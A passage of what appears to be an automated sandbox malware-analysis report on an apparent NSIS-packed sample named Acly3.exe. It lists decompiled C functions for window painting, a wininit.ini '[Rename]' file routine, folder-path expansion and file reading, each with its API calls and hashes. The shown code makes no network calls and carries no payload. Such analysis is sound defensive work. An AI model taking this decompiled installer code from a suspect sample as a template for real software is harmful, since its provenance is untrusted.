                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                            • LoadCursorW.USER32 ref: 00404857
                                                                            • SetCursor.USER32(00000000), ref: 0040485A
                                                                            • LoadCursorW.USER32 ref: 00404873
                                                                            • SetCursor.USER32(00000000), ref: 00404876
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Acly3.exe$N
                                                                            • API String ID: 3103080414-3081902285
                                                                            • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                            • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                            • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                            				struct tagLOGBRUSH _v16;
                                                                            				struct tagRECT _v32;
                                                                            				struct tagPAINTSTRUCT _v96;
                                                                            				struct HDC__* _t70;
                                                                            				struct HBRUSH__* _t87;
                                                                            				struct HFONT__* _t94;
                                                                            				long _t102;
                                                                            				signed int _t126;
                                                                            				struct HDC__* _t128;
                                                                            				intOrPtr _t130;
                                                                            
                                                                            				if(_a8 == 0xf) {
                                                                            					_t130 =  *0x434f10;
                                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                            					_a8 = _t70;
                                                                            					GetClientRect(_a4,  &_v32);
                                                                            					_t126 = _v32.bottom;
                                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                                            					while(_v32.top < _t126) {
                                                                            						_a12 = _t126 - _v32.top;
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						asm("cdq");
                                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                                            						_v32.bottom = _v32.bottom + 4;
                                                                            						_a16 = _t87;
                                                                            						FillRect(_a8,  &_v32, _t87);
                                                                            						DeleteObject(_a16);
                                                                            						_v32.top = _v32.top + 4;
                                                                            					}
                                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                            						_a16 = _t94;
                                                                            						if(_t94 != 0) {
                                                                            							_t128 = _a8;
                                                                            							_v32.left = 0x10;
                                                                            							_v32.top = 8;
                                                                            							SetBkMode(_t128, 1);
                                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                            							_a8 = SelectObject(_t128, _a16);
                                                                            							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                            							SelectObject(_t128, _a8);
                                                                            							DeleteObject(_a16);
                                                                            						}
                                                                            					}
                                                                            					EndPaint(_a4,  &_v96);
                                                                            					return 0;
                                                                            				}
                                                                            				_t102 = _a16;
                                                                            				if(_a8 == 0x46) {
                                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                            				}
                                                                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                            			}


                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406183(void* __ecx) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				long _t12;
                                                                            				long _t24;
                                                                            				char* _t31;
                                                                            				int _t37;
                                                                            				void* _t38;
                                                                            				intOrPtr* _t39;
                                                                            				long _t42;
                                                                            				WCHAR* _t44;
                                                                            				void* _t46;
                                                                            				void* _t48;
                                                                            				void* _t49;
                                                                            				void* _t52;
                                                                            				void* _t53;
                                                                            
                                                                            				_t38 = __ecx;
                                                                            				_t44 =  *(_t52 + 0x14);
                                                                            				 *0x430908 = 0x55004e;
                                                                            				 *0x43090c = 0x4c;
                                                                            				if(_t44 == 0) {
                                                                            					L3:
                                                                            					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                            						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                            						_t53 = _t52 + 0x10;
                                                                            						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                                            						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                                            						_t48 = _t12;
                                                                            						 *(_t53 + 0x18) = _t48;
                                                                            						if(_t48 != 0xffffffff) {
                                                                            							_t42 = GetFileSize(_t48, 0);
                                                                            							_t6 = _t37 + 0xa; // 0xa
                                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                            							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                                            								L18:
                                                                            								return CloseHandle(_t48);
                                                                            							} else {
                                                                            								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                            									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                                            									if(_t49 == 0) {
                                                                            										_t48 =  *(_t53 + 0x18);
                                                                            										L16:
                                                                            										_t24 = _t42;
                                                                            										L17:
                                                                            										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                                            										E004060DF(_t48, _t46, _t42 + _t37);
                                                                            										GlobalFree(_t46);
                                                                            										goto L18;
                                                                            									}
                                                                            									_t39 = _t46 + _t42;
                                                                            									_t31 = _t39 + _t37;
                                                                            									while(_t39 > _t49) {
                                                                            										 *_t31 =  *_t39;
                                                                            										_t31 = _t31 - 1;
                                                                            										_t39 = _t39 - 1;
                                                                            									}
                                                                            									_t24 = _t49 - _t46 + 1;
                                                                            									_t48 =  *(_t53 + 0x18);
                                                                            									goto L17;
                                                                            								}
                                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                            								_t42 = _t42 + 0xa;
                                                                            								goto L16;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					CloseHandle(E0040602D(_t44, 0, 1));
                                                                            					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                            						goto L3;
                                                                            					}
                                                                            				}
                                                                            				return _t12;
                                                                            			}




















                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004061BE
                                                                            • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                                            • wsprintfA.USER32 ref: 00406202
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004062F2
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                            				struct _ITEMIDLIST* _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _t44;
                                                                            				WCHAR* _t45;
                                                                            				signed char _t47;
                                                                            				signed int _t48;
                                                                            				short _t59;
                                                                            				short _t61;
                                                                            				short _t63;
                                                                            				void* _t71;
                                                                            				signed int _t77;
                                                                            				signed int _t78;
                                                                            				short _t81;
                                                                            				short _t82;
                                                                            				signed char _t84;
                                                                            				signed int _t85;
                                                                            				void* _t98;
                                                                            				void* _t104;
                                                                            				intOrPtr* _t105;
                                                                            				void* _t107;
                                                                            				WCHAR* _t108;
                                                                            				void* _t110;
                                                                            
                                                                            				_t107 = __esi;
                                                                            				_t104 = __edi;
                                                                            				_t71 = __ebx;
                                                                            				_t44 = _a8;
                                                                            				if(_t44 < 0) {
                                                                            					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                                            				}
                                                                            				_push(_t71);
                                                                            				_push(_t107);
                                                                            				_push(_t104);
                                                                            				_t105 =  *0x434f38 + _t44 * 2;
                                                                            				_t45 = 0x432ea0;
                                                                            				_t108 = 0x432ea0;
                                                                            				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                            					_t108 = _a4;
                                                                            					_a4 = _a4 & 0x00000000;
                                                                            				}
                                                                            				_t81 =  *_t105;
                                                                            				_a8 = _t81;
                                                                            				if(_t81 == 0) {
                                                                            					L43:
                                                                            					 *_t108 =  *_t108 & 0x00000000;
                                                                            					if(_a4 == 0) {
                                                                            						return _t45;
                                                                            					}
                                                                            					return E0040653D(_a4, _t45);
                                                                            				} else {
                                                                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                            						_t98 = 2;
                                                                            						_t105 = _t105 + _t98;
                                                                            						if(_t81 >= 4) {
                                                                            							if(__eflags != 0) {
                                                                            								 *_t108 = _t81;
                                                                            								_t108 = _t108 + _t98;
                                                                            								__eflags = _t108;
                                                                            							} else {
                                                                            								 *_t108 =  *_t105;
                                                                            								_t108 = _t108 + _t98;
                                                                            								_t105 = _t105 + _t98;
                                                                            							}
                                                                            							L42:
                                                                            							_t82 =  *_t105;
                                                                            							_a8 = _t82;
                                                                            							if(_t82 != 0) {
                                                                            								_t81 = _a8;
                                                                            								continue;
                                                                            							}
                                                                            							goto L43;
                                                                            						}
                                                                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                            						_t47 =  *_t105;
                                                                            						_t48 = _t47 & 0x000000ff;
                                                                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                            						_t85 = _t84 & 0x000000ff;
                                                                            						_v28 = _t48 | 0x00008000;
                                                                            						_t77 = 2;
                                                                            						_v16 = _t85;
                                                                            						_t105 = _t105 + _t77;
                                                                            						_v24 = _t48;
                                                                            						_v20 = _t85 | 0x00008000;
                                                                            						if(_a8 != _t77) {
                                                                            							__eflags = _a8 - 3;
                                                                            							if(_a8 != 3) {
                                                                            								__eflags = _a8 - 1;
                                                                            								if(__eflags == 0) {
                                                                            									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                            									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                            								}
                                                                            								L38:
                                                                            								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                            								_t45 = 0x432ea0;
                                                                            								goto L42;
                                                                            							}
                                                                            							_t78 = _v12;
                                                                            							__eflags = _t78 - 0x1d;
                                                                            							if(_t78 != 0x1d) {
                                                                            								__eflags = (_t78 << 0xb) + 0x436000;
                                                                            								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                                            							} else {
                                                                            								E00406484(_t108,  *0x434f08);
                                                                            							}
                                                                            							__eflags = _t78 + 0xffffffeb - 7;
                                                                            							if(__eflags < 0) {
                                                                            								L29:
                                                                            								E004067C4(_t108);
                                                                            							}
                                                                            							goto L38;
                                                                            						}
                                                                            						if( *0x434f84 != 0) {
                                                                            							_t77 = 4;
                                                                            						}
                                                                            						_t121 = _t48;
                                                                            						if(_t48 >= 0) {
                                                                            							__eflags = _t48 - 0x25;
                                                                            							if(_t48 != 0x25) {
                                                                            								__eflags = _t48 - 0x24;
                                                                            								if(_t48 == 0x24) {
                                                                            									GetWindowsDirectoryW(_t108, 0x400);
                                                                            									_t77 = 0;
                                                                            								}
                                                                            								while(1) {
                                                                            									__eflags = _t77;
                                                                            									if(_t77 == 0) {
                                                                            										goto L26;
                                                                            									}
                                                                            									_t59 =  *0x434f04;
                                                                            									_t77 = _t77 - 1;
                                                                            									__eflags = _t59;
                                                                            									if(_t59 == 0) {
                                                                            										L22:
                                                                            										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                            										__eflags = _t61;
                                                                            										if(_t61 != 0) {
                                                                            											L24:
                                                                            											 *_t108 =  *_t108 & 0x00000000;
                                                                            											__eflags =  *_t108;
                                                                            											continue;
                                                                            										}
                                                                            										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                            										_a8 = _t61;
                                                                            										__imp__CoTaskMemFree(_v8);
                                                                            										__eflags = _a8;
                                                                            										if(_a8 != 0) {
                                                                            											goto L26;
                                                                            										}
                                                                            										goto L24;
                                                                            									}
                                                                            									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                            									__eflags = _t63;
                                                                            									if(_t63 == 0) {
                                                                            										goto L26;
                                                                            									}
                                                                            									goto L22;
                                                                            								}
                                                                            								goto L26;
                                                                            							}
                                                                            							GetSystemDirectoryW(_t108, 0x400);
                                                                            							goto L26;
                                                                            						} else {
                                                                            							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                            							if( *_t108 != 0) {
                                                                            								L27:
                                                                            								if(_v16 == 0x1a) {
                                                                            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                            								}
                                                                            								goto L29;
                                                                            							}
                                                                            							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                                            							L26:
                                                                            							if( *_t108 == 0) {
                                                                            								goto L29;
                                                                            							}
                                                                            							goto L27;
                                                                            						}
                                                                            					}
                                                                            					goto L43;
                                                                            				}
                                                                            			}






























                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000400), ref: 00406695
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,74EC110C), ref: 004066A8
                                                                            • lstrcatW.KERNEL32 ref: 0040671F
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Acly3.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 4260037668-3803493691
                                                                            • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                            • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                            				struct tagLOGBRUSH _v16;
                                                                            				long _t39;
                                                                            				long _t41;
                                                                            				void* _t44;
                                                                            				signed char _t50;
                                                                            				long* _t54;
                                                                            
                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                            					L18:
                                                                            					return 0;
                                                                            				}
                                                                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                            					goto L18;
                                                                            				} else {
                                                                            					_t50 = _t54[5];
                                                                            					if((_t50 & 0xffffffe0) != 0) {
                                                                            						goto L18;
                                                                            					}
                                                                            					_t39 =  *_t54;
                                                                            					if((_t50 & 0x00000002) != 0) {
                                                                            						_t39 = GetSysColor(_t39);
                                                                            					}
                                                                            					if((_t54[5] & 0x00000001) != 0) {
                                                                            						SetTextColor(_a8, _t39);
                                                                            					}
                                                                            					SetBkMode(_a8, _t54[4]);
                                                                            					_t41 = _t54[1];
                                                                            					_v16.lbColor = _t41;
                                                                            					if((_t54[5] & 0x00000008) != 0) {
                                                                            						_t41 = GetSysColor(_t41);
                                                                            						_v16.lbColor = _t41;
                                                                            					}
                                                                            					if((_t54[5] & 0x00000004) != 0) {
                                                                            						SetBkColor(_a8, _t41);
                                                                            					}
                                                                            					if((_t54[5] & 0x00000010) != 0) {
                                                                            						_v16.lbStyle = _t54[2];
                                                                            						_t44 = _t54[3];
                                                                            						if(_t44 != 0) {
                                                                            							DeleteObject(_t44);
                                                                            						}
                                                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                                                            					}
                                                                            					return _t54[3];
                                                                            				}
                                                                            			}










                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                            				intOrPtr _t65;
                                                                            				intOrPtr _t66;
                                                                            				intOrPtr _t72;
                                                                            				void* _t76;
                                                                            				void* _t79;
                                                                            
                                                                            				_t72 = __edx;
                                                                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                            				_t65 = 2;
                                                                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                            				_t66 = E00402D84(_t65);
                                                                            				_t79 = _t66 - 1;
                                                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                            				if(_t79 < 0) {
                                                                            					L36:
                                                                            					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                            				} else {
                                                                            					__ecx = 0x3ff;
                                                                            					if(__eax > 0x3ff) {
                                                                            						 *(__ebp - 0x44) = 0x3ff;
                                                                            					}
                                                                            					if( *__edi == __bx) {
                                                                            						L34:
                                                                            						__ecx =  *(__ebp - 0xc);
                                                                            						__eax =  *(__ebp - 8);
                                                                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                            						if(_t79 == 0) {
                                                                            							 *(_t76 - 4) = 1;
                                                                            						}
                                                                            						goto L36;
                                                                            					} else {
                                                                            						 *(__ebp - 0x38) = __ebx;
                                                                            						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                                            						if( *(__ebp - 0x44) > __ebx) {
                                                                            							do {
                                                                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                                            										__eax = __ebp - 0x50;
                                                                            										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                            											goto L34;
                                                                            										} else {
                                                                            											goto L21;
                                                                            										}
                                                                            									} else {
                                                                            										goto L34;
                                                                            									}
                                                                            								} else {
                                                                            									__eax = __ebp - 0x40;
                                                                            									_push(__ebx);
                                                                            									_push(__ebp - 0x40);
                                                                            									__eax = 2;
                                                                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                            									if(__eax == 0) {
                                                                            										goto L34;
                                                                            									} else {
                                                                            										__ecx =  *(__ebp - 0x40);
                                                                            										if(__ecx == __ebx) {
                                                                            											goto L34;
                                                                            										} else {
                                                                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                            											 *(__ebp - 0x4c) = __ecx;
                                                                            											 *(__ebp - 0x50) = __eax;
                                                                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                            												L28:
                                                                            												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                            											} else {
                                                                            												__ebp - 0x50 = __ebp + 0xa;
                                                                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                            													L21:
                                                                            													__eax =  *(__ebp - 0x50);
                                                                            												} else {
                                                                            													__edi =  *(__ebp - 0x4c);
                                                                            													__edi =  ~( *(__ebp - 0x4c));
                                                                            													while(1) {
                                                                            														_t22 = __ebp - 0x40;
                                                                            														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                            														__eax = 0xfffd;
                                                                            														 *(__ebp - 0x50) = 0xfffd;
                                                                            														if( *_t22 == 0) {
                                                                            															goto L22;
                                                                            														}
                                                                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                            														__edi = __edi + 1;
                                                                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                            														__eax = __ebp + 0xa;
                                                                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                            															continue;
                                                                            														} else {
                                                                            															goto L21;
                                                                            														}
                                                                            														goto L22;
                                                                            													}
                                                                            												}
                                                                            												L22:
                                                                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                            													goto L28;
                                                                            												} else {
                                                                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                            														} else {
                                                                            															__ecx =  *(__ebp - 0xc);
                                                                            															__edx =  *(__ebp - 8);
                                                                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                            														}
                                                                            														goto L34;
                                                                            													} else {
                                                                            														__ecx =  *(__ebp - 0xc);
                                                                            														__edx =  *(__ebp - 8);
                                                                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                            														 *(__ebp - 0x38) = __eax;
                                                                            														if(__ax == __bx) {
                                                                            															goto L34;
                                                                            														} else {
                                                                            															goto L26;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L37;
                                                                            								L26:
                                                                            								__eax =  *(__ebp - 8);
                                                                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                            						}
